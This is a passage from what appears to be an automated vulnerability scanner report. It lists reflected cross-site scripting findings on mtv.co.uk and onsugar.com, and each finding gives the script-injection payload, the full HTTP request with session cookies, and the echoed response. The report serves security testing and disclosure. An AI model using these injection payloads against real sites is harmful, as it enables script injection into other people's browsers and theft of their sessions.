Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:57 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:58 GMT
Date: Mon, 12 Sep 2011 12:49:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
m.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/blueprint/blueprint/13e42"-alert(1)-"a0ad2d31b48");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.115. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b14d0"-alert(1)-"2105664c6ae was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/b14d0"-alert(1)-"2105664c6ae HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:32 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:32 GMT
Date: Mon, 12 Sep 2011 12:50:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/b14d0"-alert(1)-"2105664c6ae");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.116. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/blackberry.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/blackberry.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfba0"-alert(1)-"2c6339de47 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/bfba0"-alert(1)-"2c6339de47 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13429
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:37 GMT
Date: Mon, 12 Sep 2011 12:50:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/bfba0"-alert(1)-"2c6339de47");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.117. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/bodyform.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/bodyform.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff1e"-alert(1)-"e7d91e0ee6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/2ff1e"-alert(1)-"e7d91e0ee6e HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:38 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/2ff1e"-alert(1)-"e7d91e0ee6e");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.118. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/nokiaSessions.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/nokiaSessions.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88536"-alert(1)-"237f981c1a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/88536"-alert(1)-"237f981c1a HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:38 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/88536"-alert(1)-"237f981c1a");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.119. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/seat.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/seat.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2b51"-alert(1)-"b39b60171d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/f2b51"-alert(1)-"b39b60171d6 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:41 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13427
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:41 GMT
Date: Mon, 12 Sep 2011 12:50:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/f2b51"-alert(1)-"b39b60171d6");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.120. http://www.mtv.co.uk/sites/all/themes/mtvuk/subthemes/default_homepage/style.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/subthemes/default_homepage/style.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8a26"-alert(1)-"fe7e87ae90 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/subthemes/default_homepage/a8a26"-alert(1)-"fe7e87ae90?1236968319 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:04 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13467
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:04 GMT
Date: Mon, 12 Sep 2011 12:50:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/subthemes/default_homepage/a8a26"-alert(1)-"fe7e87ae90");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.121. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b038"-alert(1)-"d884786df1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/facebook_connect/4b038"-alert(1)-"d884786df1d HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832637%7CniqThxHrFM6F9um5QMGO0Ha%2F900oOKaea4pFhHEg4fO%2BNyXxQL5KKlHaibhzlVJ9UAEElI6baYteQrbTmlbjWhBTc7kk9vrEDtgGCkCuGSH0545XXfw14KzbHDFnWXT%2B9GpovDipRdhalTg4v5aLt%2BbYGO8otzFEahOJ8nzQ6f3X4cS6fS%2FhDLpvmR%2Fj8BUhKyvPN%2B5kKDVxMtlnpFevWQ%3D%3D%7C440dec8fa777e1eb7ee9a1eda4d09f02ca35174c; expires=Wed, 05-Oct-2011 16:37:17 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:57 GMT
Server: lighttpd/1.4.26
Content-Length: 7693

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/modules/facebook_connect/4b038"-alert(1)-"d884786df1d",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.122. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53383"><script>alert(1)</script>15a9ee32b04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/facebook_connect/53383"><script>alert(1)</script>15a9ee32b04 HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832636%7CnrCFFU5HiGaDcKE22GGcSWnNcIXj2hbzsDv2wu7rlIzzk6DwOI%2FLfUo46NrmlZik4ydq1Il8xCtLWdfstVMAyq%2B%2Baj4E7u%2FAFq9%2B6eHrUycU9M3q%2BIoJrxeOSJv94nqYJSjuszq6LHAUaKfixPBP8FbgPE%2FcknrtnYYHv5hOL0cyj6dyCLRY6WECpUvGWHOyX3w1ixrbGh2FODyUaJ6lSg%3D%3D%7Cd0d75e3d96806545c20a7ac291cd8c7aa2a1fc20; expires=Wed, 05-Oct-2011 16:37:16 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:56 GMT
Server: lighttpd/1.4.26
Content-Length: 7798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/modules/facebook_connect/53383"><script>alert(1)</script>15a9ee32b04&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.123. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d96"><script>alert(1)</script>5c26a4aba3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /statica4d96"><script>alert(1)</script>5c26a4aba3e/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832641%7Ca%2FtbvUs37Q9DtUqtr%2FBY3wsoFZJ6tC9NYob5X2Hi3sLWq8cjORAu%2F8ZB6BMvJLztS9GxF6JhuR7nQ%2Fu38AAUtGFZrcUBzXuKKwab%2BN8v0JA9dJUdmzea5V3Vqao0laNl46FCxLHMqi8ODVZ9YD9Dv%2BF%2BTKE8qe4M8bIYddu2FEq1UAb1ff16kYc0rK3AkJUtB5qwifdNRLN7dcmDG9d9vQ%3D%3D%7C4dc22acb678517f2a04aa1e67a1c489fc827297f; expires=Wed, 05-Oct-2011 16:37:21 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:01 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
